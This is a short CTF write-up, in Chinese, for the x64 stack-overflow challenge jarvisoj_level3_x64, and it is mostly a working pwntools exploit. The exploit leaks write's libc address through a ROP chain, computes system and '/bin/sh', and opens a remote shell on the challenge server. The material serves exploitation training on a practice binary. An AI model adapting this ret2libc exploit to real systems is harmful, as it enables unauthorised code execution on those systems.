jarvisoj_level3_x64

jarvisoj_level3_x64

使用checksec查看：

只开启了栈不可执行，应该是jarvisoj_level3的x64版本，直接放进IDA中看吧：

主函数中直接给出了漏洞函数，跟进查看：

read()函数，存在栈溢出，和jarvisoj_level3的主要区别在栈上传参和寄存器传参。

exp：

from pwn import *

#start
# r = process("../buu/jarvisoj_level3_x64")
r = remote("node4.buuoj.cn",28760)
elf = ELF("../buu/jarvisoj_level3_x64")
libc = ELF("../buu/ubuntu16(64).so")

#params
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.symbols['main']
rdi_addr = 0x4006b3
rsir15_addr = 0x4006b1

#attack
payload = b'M'*(0x80+8) + p64(rdi_addr) + p64(1) + p64(rsir15_addr) + p64(write_got) + b'M'*8 + p64(write_plt) + p64(main_addr)
r.sendlineafter("Input:\n",payload)
write_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))

#libc
base_addr = write_addr - libc.symbols['write']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b"/bin/sh"))

#attack2
payload = b'M'*(0x80+8) + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
r.sendlineafter("Input:\n",payload)

r.interactive()